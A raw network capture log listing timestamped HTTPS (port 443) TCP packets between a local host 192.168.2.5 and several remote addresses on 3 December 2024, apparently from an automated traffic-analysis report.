                                Dec 3, 2024 17:50:55.930589914 CET4434996323.218.208.109192.168.2.5
                                Dec 3, 2024 17:50:55.930668116 CET49963443192.168.2.523.218.208.109
                                Dec 3, 2024 17:50:55.930674076 CET4434996323.218.208.109192.168.2.5
                                Dec 3, 2024 17:50:56.291929007 CET49964443192.168.2.523.218.208.109
                                Dec 3, 2024 17:50:56.291980028 CET4434996423.218.208.109192.168.2.5
                                Dec 3, 2024 17:50:56.297045946 CET49964443192.168.2.523.218.208.109
                                Dec 3, 2024 17:50:56.302992105 CET49964443192.168.2.523.218.208.109
                                Dec 3, 2024 17:50:56.303006887 CET4434996423.218.208.109192.168.2.5
                                Dec 3, 2024 17:50:57.736115932 CET4434996423.218.208.109192.168.2.5
                                Dec 3, 2024 17:50:57.745090961 CET49964443192.168.2.523.218.208.109
                                Dec 3, 2024 17:50:57.805982113 CET49964443192.168.2.523.218.208.109
                                Dec 3, 2024 17:50:57.806005001 CET4434996423.218.208.109192.168.2.5
                                Dec 3, 2024 17:50:57.806245089 CET4434996423.218.208.109192.168.2.5
                                Dec 3, 2024 17:50:57.809107065 CET49964443192.168.2.523.218.208.109
                                Dec 3, 2024 17:50:57.855329990 CET4434996423.218.208.109192.168.2.5
                                Dec 3, 2024 17:50:58.386603117 CET4434996423.218.208.109192.168.2.5
                                Dec 3, 2024 17:50:58.386666059 CET4434996423.218.208.109192.168.2.5
                                Dec 3, 2024 17:50:58.388304949 CET49964443192.168.2.523.218.208.109
                                Dec 3, 2024 17:50:58.410082102 CET49964443192.168.2.523.218.208.109
                                Dec 3, 2024 17:50:58.410099030 CET4434996423.218.208.109192.168.2.5
                                Dec 3, 2024 17:50:58.410137892 CET49964443192.168.2.523.218.208.109
                                Dec 3, 2024 17:50:58.410144091 CET4434996423.218.208.109192.168.2.5
                                Dec 3, 2024 17:51:04.912250042 CET49966443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:04.912300110 CET4434996613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:04.912661076 CET49966443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:04.913057089 CET49966443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:04.913067102 CET4434996613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:05.809220076 CET49967443192.168.2.520.109.210.53
                                Dec 3, 2024 17:51:05.809268951 CET4434996720.109.210.53192.168.2.5
                                Dec 3, 2024 17:51:05.809704065 CET49967443192.168.2.520.109.210.53
                                Dec 3, 2024 17:51:05.811253071 CET49967443192.168.2.520.109.210.53
                                Dec 3, 2024 17:51:05.811265945 CET4434996720.109.210.53192.168.2.5
                                Dec 3, 2024 17:51:06.702488899 CET4434996613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:06.711327076 CET4434996613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:06.717981100 CET49966443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:06.823338985 CET49966443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:06.823359013 CET4434996613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:06.823741913 CET4434996613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:06.835810900 CET49966443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:06.883325100 CET4434996613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:07.198679924 CET4434996613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:07.198709965 CET4434996613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:07.198724031 CET4434996613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:07.198839903 CET49966443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:07.198863029 CET4434996613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:07.199223995 CET49966443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:07.381015062 CET4434996613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:07.381035089 CET4434996613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:07.381237984 CET49966443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:07.381256104 CET4434996613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:07.381311893 CET49966443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:07.462949991 CET4434996613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:07.462973118 CET4434996613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:07.475332975 CET4434996613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:07.476882935 CET49966443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:07.478172064 CET49966443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:07.547132015 CET4434996613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:07.547161102 CET4434996613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:07.547329903 CET49966443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:07.547347069 CET4434996613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:07.547389030 CET49966443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:07.587732077 CET4434996613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:07.587757111 CET4434996613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:07.587855101 CET49966443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:07.587867975 CET4434996613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:07.588049889 CET49966443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:07.605380058 CET4434996720.109.210.53192.168.2.5
                                Dec 3, 2024 17:51:07.606380939 CET49967443192.168.2.520.109.210.53
                                Dec 3, 2024 17:51:07.609747887 CET49967443192.168.2.520.109.210.53
                                Dec 3, 2024 17:51:07.609766960 CET4434996720.109.210.53192.168.2.5
                                Dec 3, 2024 17:51:07.610040903 CET4434996720.109.210.53192.168.2.5
                                Dec 3, 2024 17:51:07.614537001 CET4434996613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:07.614557981 CET4434996613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:07.618648052 CET49966443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:07.618659019 CET4434996613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:07.618916035 CET49966443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:07.636627913 CET4434996613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:07.636655092 CET4434996613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:07.637538910 CET49966443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:07.637547016 CET4434996613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:07.640800953 CET49966443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:07.640980005 CET49966443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:07.677469969 CET49967443192.168.2.520.109.210.53
                                Dec 3, 2024 17:51:07.752876043 CET4434996613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:07.752903938 CET4434996613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:07.753062963 CET49966443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:07.753081083 CET4434996613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:07.753278971 CET49966443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:07.773154020 CET4434996613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:07.773176908 CET4434996613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:07.773305893 CET49966443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:07.773325920 CET4434996613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:07.773416996 CET49966443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:07.793787003 CET4434996613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:07.793808937 CET4434996613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:07.795295954 CET49966443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:07.795295954 CET49966443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:07.795316935 CET4434996613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:07.795398951 CET49966443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:07.806924105 CET4434996613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:07.806945086 CET4434996613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:07.807562113 CET49966443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:07.807645082 CET49966443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:07.807650089 CET4434996613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:07.807713985 CET49966443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:07.819915056 CET4434996613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:07.819933891 CET4434996613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:07.831377029 CET49966443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:07.834829092 CET4434996613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:07.834882021 CET4434996613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:07.839113951 CET49966443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:07.839123964 CET4434996613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:07.839241982 CET49966443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:07.839241982 CET49966443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:07.840698957 CET4434996613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:07.840765953 CET4434996613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:07.846771002 CET49966443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:07.851808071 CET49966443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:07.851823092 CET4434996613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:07.851834059 CET49966443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:07.851838112 CET4434996613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:07.960045099 CET49968443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:07.960091114 CET4434996813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:07.960236073 CET49969443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:07.960282087 CET4434996913.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:07.960352898 CET49968443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:07.960385084 CET49969443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:07.963057995 CET49968443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:07.963072062 CET4434996813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:07.963253975 CET49969443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:07.963270903 CET4434996913.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:07.964915037 CET49970443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:07.964926004 CET4434997013.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:07.965008974 CET49970443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:07.965126038 CET49970443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:07.965133905 CET4434997013.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:07.968142986 CET49971443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:07.968157053 CET4434997113.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:07.978461981 CET49972443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:07.978487968 CET4434997213.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:07.986491919 CET49971443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:07.986499071 CET49972443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:07.988152027 CET49971443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:07.988167048 CET4434997113.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:07.988250017 CET49972443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:07.988260031 CET4434997213.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:09.778958082 CET4434997013.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:09.797167063 CET4434997113.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:09.823120117 CET49970443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:09.823143959 CET4434997013.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:09.823626995 CET49970443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:09.823632002 CET4434997013.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:09.824580908 CET49971443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:09.824609995 CET4434997113.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:09.825000048 CET49971443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:09.825006008 CET4434997113.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:09.835530043 CET4434996813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:09.842741013 CET4434996913.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:09.859752893 CET4434997213.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:09.886225939 CET49968443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:09.886360884 CET49969443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:09.906553030 CET49972443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:09.997323036 CET49968443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:09.997342110 CET4434996813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:09.997895956 CET49968443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:09.997900009 CET4434996813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:10.045852900 CET49969443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:10.045878887 CET4434996913.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:10.047202110 CET49969443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:10.047209978 CET4434996913.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:10.081068039 CET49972443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:10.081089020 CET4434997213.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:10.081583977 CET49972443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:10.081588030 CET4434997213.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:10.230628967 CET4434997013.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:10.230653048 CET4434997013.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:10.232297897 CET49970443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:10.232316971 CET4434997013.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:10.232434988 CET49970443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:10.232815027 CET49970443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:10.232821941 CET4434997013.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:10.232837915 CET49970443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:10.232981920 CET4434997013.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:10.233010054 CET4434997013.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:10.234596968 CET49970443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:10.235872030 CET49974443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:10.235897064 CET4434997413.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:10.236046076 CET49974443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:10.236633062 CET49974443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:10.236644030 CET4434997413.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:10.250350952 CET4434997113.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:10.250374079 CET4434997113.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:10.250883102 CET4434997113.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:10.251837969 CET49971443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:10.252412081 CET49971443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:10.252430916 CET4434997113.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:10.252443075 CET49971443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:10.252449036 CET4434997113.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:10.260380030 CET49975443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:10.260410070 CET4434997513.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:10.260997057 CET49975443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:10.265733957 CET49975443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:10.265747070 CET4434997513.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:10.267668962 CET49967443192.168.2.520.109.210.53
                                Dec 3, 2024 17:51:10.315323114 CET4434996720.109.210.53192.168.2.5
                                Dec 3, 2024 17:51:10.341692924 CET4434996813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:10.341717005 CET4434996813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:10.342374086 CET49968443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:10.342392921 CET4434996813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:10.342441082 CET49968443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:10.342746973 CET4434996813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:10.342802048 CET4434996813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:10.343322992 CET49968443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:10.343595028 CET49968443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:10.343611002 CET4434996813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:10.343622923 CET49968443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:10.343630075 CET4434996813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:10.348278046 CET49976443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:10.348298073 CET4434997613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:10.349086046 CET49976443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:10.349479914 CET49976443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:10.349488020 CET4434997613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:10.382780075 CET4434996913.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:10.382863998 CET4434996913.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:10.383050919 CET49969443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:10.383088112 CET49969443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:10.383095980 CET4434996913.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:10.383106947 CET49969443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:10.383111000 CET4434996913.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:10.386296988 CET49977443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:10.386327982 CET4434997713.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:10.386689901 CET49977443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:10.387540102 CET49977443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:10.387561083 CET4434997713.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:10.415348053 CET4434997213.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:10.415404081 CET4434997213.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:10.416158915 CET49972443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:10.416992903 CET49972443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:10.417002916 CET4434997213.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:10.417013884 CET49972443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:10.417018890 CET4434997213.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:10.425035000 CET49978443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:10.425061941 CET4434997813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:10.425148010 CET49978443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:10.431025982 CET49978443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:10.431040049 CET4434997813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:10.849056005 CET4434996720.109.210.53192.168.2.5
                                Dec 3, 2024 17:51:10.849078894 CET4434996720.109.210.53192.168.2.5
                                Dec 3, 2024 17:51:10.849087954 CET4434996720.109.210.53192.168.2.5
                                Dec 3, 2024 17:51:10.849114895 CET4434996720.109.210.53192.168.2.5
                                Dec 3, 2024 17:51:10.849133968 CET4434996720.109.210.53192.168.2.5
                                Dec 3, 2024 17:51:10.849140882 CET4434996720.109.210.53192.168.2.5
                                Dec 3, 2024 17:51:10.849309921 CET49967443192.168.2.520.109.210.53
                                Dec 3, 2024 17:51:10.849323034 CET4434996720.109.210.53192.168.2.5
                                Dec 3, 2024 17:51:10.849370003 CET49967443192.168.2.520.109.210.53
                                Dec 3, 2024 17:51:10.868252039 CET4434996720.109.210.53192.168.2.5
                                Dec 3, 2024 17:51:10.868263006 CET4434996720.109.210.53192.168.2.5
                                Dec 3, 2024 17:51:10.868347883 CET4434996720.109.210.53192.168.2.5
                                Dec 3, 2024 17:51:10.869247913 CET49967443192.168.2.520.109.210.53
                                Dec 3, 2024 17:51:12.046153069 CET4434997513.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:12.047564030 CET49975443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:12.047581911 CET4434997513.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:12.048068047 CET49975443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:12.048073053 CET4434997513.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:12.083168030 CET4434997413.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:12.083606005 CET49974443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:12.083626986 CET4434997413.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:12.084064007 CET49974443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:12.084068060 CET4434997413.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:12.136091948 CET4434997613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:12.136590958 CET49976443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:12.136626005 CET4434997613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:12.137065887 CET49976443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:12.137069941 CET4434997613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:12.177660942 CET4434997713.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:12.189028978 CET49977443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:12.189064026 CET4434997713.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:12.189524889 CET49977443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:12.189532995 CET4434997713.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:12.225615978 CET4434997813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:12.228106022 CET49978443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:12.228132010 CET4434997813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:12.228568077 CET49978443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:12.228571892 CET4434997813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:12.492022038 CET4434997513.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:12.492089987 CET4434997513.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:12.496692896 CET49975443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:12.498174906 CET49975443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:12.498192072 CET4434997513.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:12.498205900 CET49975443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:12.498210907 CET4434997513.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:12.502981901 CET49981443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:12.503021955 CET4434998113.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:12.503093004 CET49981443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:12.503251076 CET49981443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:12.503268003 CET4434998113.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:12.582384109 CET4434997613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:12.582457066 CET4434997613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:12.591331005 CET4434997613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:12.596973896 CET49976443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:12.614166021 CET4434997413.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:12.614227057 CET4434997413.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:12.623326063 CET4434997413.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:12.625089884 CET4434997713.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:12.625143051 CET4434997713.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:12.628226042 CET49974443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:12.628241062 CET49977443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:12.669701099 CET4434997813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:12.669764042 CET4434997813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:12.675168991 CET49978443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:12.698410988 CET49967443192.168.2.520.109.210.53
                                Dec 3, 2024 17:51:12.698451042 CET4434996720.109.210.53192.168.2.5
                                Dec 3, 2024 17:51:12.698479891 CET49967443192.168.2.520.109.210.53
                                Dec 3, 2024 17:51:12.698489904 CET4434996720.109.210.53192.168.2.5
                                Dec 3, 2024 17:51:12.876126051 CET49976443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:12.876166105 CET4434997613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:12.876183033 CET49976443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:12.876189947 CET4434997613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:12.878398895 CET49978443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:12.878405094 CET4434997813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:12.878415108 CET49978443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:12.878417969 CET4434997813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:12.879697084 CET49974443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:12.879697084 CET49974443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:12.879725933 CET4434997413.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:12.879738092 CET4434997413.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:12.880645037 CET49977443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:12.880645037 CET49977443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:12.880677938 CET4434997713.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:12.880690098 CET4434997713.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:13.078128099 CET49983443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:13.078165054 CET4434998313.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:13.079488039 CET49984443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:13.079495907 CET4434998413.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:13.081295013 CET49985443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:13.081337929 CET4434998513.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:13.085169077 CET49986443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:13.085177898 CET4434998613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:13.089241982 CET49983443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:13.089284897 CET49984443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:13.089369059 CET49985443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:13.089435101 CET49986443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:13.089879990 CET49986443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:13.089895964 CET4434998613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:13.090033054 CET49983443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:13.090042114 CET4434998313.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:13.090389967 CET49984443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:13.090399981 CET4434998413.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:13.094474077 CET49985443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:13.094485044 CET4434998513.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:14.247704029 CET4434998113.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:14.251184940 CET49981443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:14.251204014 CET4434998113.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:14.253259897 CET49981443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:14.253266096 CET4434998113.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:14.683676958 CET4434998113.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:14.683780909 CET4434998113.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:14.684005976 CET49981443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:14.686532021 CET49981443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:14.686532021 CET49981443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:14.686551094 CET4434998113.107.246.63192.168.2.5
